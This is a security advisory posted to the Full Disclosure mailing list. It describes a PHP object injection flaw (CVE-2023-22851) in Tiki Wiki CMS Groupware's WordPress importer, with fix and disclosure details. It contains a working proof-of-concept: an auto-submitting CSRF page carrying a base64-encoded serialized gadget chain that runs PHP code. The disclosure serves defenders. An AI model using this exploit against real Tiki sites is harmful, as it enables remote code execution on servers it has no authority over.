[<prev] [next>] [day] [month] [year] [list]
Message-ID: <4de47e82b0b50e4842833879d4797e54@karmainsecurity.com>
Date: Mon, 09 Jan 2023 21:11:01 +0100
From: Egidio Romano <research@...mainsecurity.com>
To: Full Disclosure <fulldisclosure@...lists.org>,
submissions@...ketstormsecurity.com
Subject: [FD] [KIS-2023-04] Tiki Wiki CMS Groupware <= 24.1
(tikiimporter_blog_wordpress.php) PHP Object Injection Vulnerability
----------------------------------------------------------------------------------------------------
Tiki Wiki CMS Groupware <= 24.1 (tikiimporter_blog_wordpress.php) PHP
Object Injection Vulnerability
----------------------------------------------------------------------------------------------------
[-] Software Link:
https://tiki.org
[-] Affected Versions:
Version 24.1 and prior versions.
[-] Vulnerability Description:
The vulnerability is located in the
/lib/importer/tikiimporter_blog_wordpress.php script. Specifically, when
importing data from WordPress sites through the Tiki Importer, user
input passed through the uploaded XML file is being used in a call to
the unserialize() PHP function. This can be exploited by malicious users
to inject arbitrary PHP objects into the application scope, allowing
them to perform a variety of attacks, such as executing arbitrary PHP
code. Successful exploitation of this vulnerability requires an admin
account (specifically, the ‘tiki_p_admin_importer’ permission). However,
due to the CSRF vulnerability described in KIS-2023-01, this
vulnerability might also be exploited by tricking a victim user into
opening a web page like the following:
<html>
<form action="http://localhost/tiki/tiki-importer.php" method="POST"
enctype="multipart/form-data">
<input type="hidden" name="importerClassName"
value="TikiImporter_Blog_Wordpress" />
<input type="hidden" name="importAttachments" value="on" />
<input type="file" name="importFile" id="fileinput"/>
</form>
<script>
const xmlContent =
atob("PD94bWwgdmVyc2lvbj0iMS4wIiA/Pgo8cnNzIHZlcnNpb249IjIuMCIgeG1sbnM6d3A9Imh0dHA6Ly93b3JkcHJlc3Mub3JnL2V4cG9ydC8xLjIvIj4KIDxjaGFubmVsPgogIDxpdGVtPgogICA8d3A6cG9zdF90eXBlPmF0dGFjaG1lbnQ8L3dwOnBvc3RfdHlwZT4KICAgPHdwOnBvc3RtZXRhPgogICAgPHdwOm1ldGFfa2V5Pl93cF9hdHRhY2htZW50X21ldGFkYXRhPC93cDptZXRhX2tleT4KICAgIDx3cDptZXRhX3ZhbHVlPjwhW0NEQVRBW086MjU6IlNlYXJjaF9FbGFzdGljX0Nvbm5lY3Rpb24iOjE6e1M6MzE6IlwwMFNlYXJjaF9FbGFzdGljX0Nvbm5lY3Rpb25cMDBidWxrIjtPOjI4OiJTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uIjozOntTOjM1OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwY291bnQiO2k6MTtTOjM4OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwY2FsbGJhY2siO1M6MTQ6ImNhbGxfdXNlcl9mdW5jIjtTOjM2OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwYnVmZmVyIjthOjI6e2k6MDtPOjIyOiJUcmFja2VyX0ZpZWxkX0NvbXB1dGVkIjozOntTOjMyOiJcMDBUcmFja2VyX0ZpZWxkX0Fic3RyYWN0XDAwaXRlbURhdGEiO2E6MTp7Uzo2OiJpdGVtSWQiO2k6MTt9UzozMToiXDAwVHJhY2tlcl9GaWVsZF9BYnN0cmFjdFwwMG9wdGlvbnMiO086MTU6IlRyYWNrZXJfT3B0aW9ucyI6MTp7UzoyMToiXDAwVHJhY2tlcl9PcHRpb25zXDAw
ZGF0YSI7YToxOntTOjc6ImZvcm11bGEiO1M6MTQ6Im51bGw7cGhwaW5mbygpIjt9fVM6NDE6IlwwMFRyYWNrZXJfRmllbGRfQWJzdHJhY3RcMDB0cmFja2VyRGVmaW5pdGlvbiI7TzoxODoiVHJhY2tlcl9EZWZpbml0aW9uIjowOnt9fWk6MTtTOjEyOiJnZXRGaWVsZERhdGEiO319fV1dPjwvd3A6bWV0YV92YWx1ZT4KICAgPC93cDpwb3N0bWV0YT4KICA8L2l0ZW0+CiA8L2NoYW5uZWw+CjwvcnNzPg==");
const fileInput = document.getElementById("fileinput");
const dataTransfer = new DataTransfer();
const file = new File([xmlContent], "test.xml", {type: "text/xml"});
dataTransfer.items.add(file);
fileInput.files = dataTransfer.files;
document.forms[0].submit();
</script>
</html>
[-] Solution:
Upgrade to version 24.2 or later.
[-] Disclosure Timeline:
[07/03/2022] - Vendor notified
[23/08/2022] - Version 24.1 released
[09/01/2023] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2023-22851 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2023-04
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists